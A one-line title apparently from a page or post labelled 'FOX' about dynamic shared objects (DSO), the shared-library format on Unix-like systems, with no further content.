FOX ★ DSO(Dynamic Shared Object)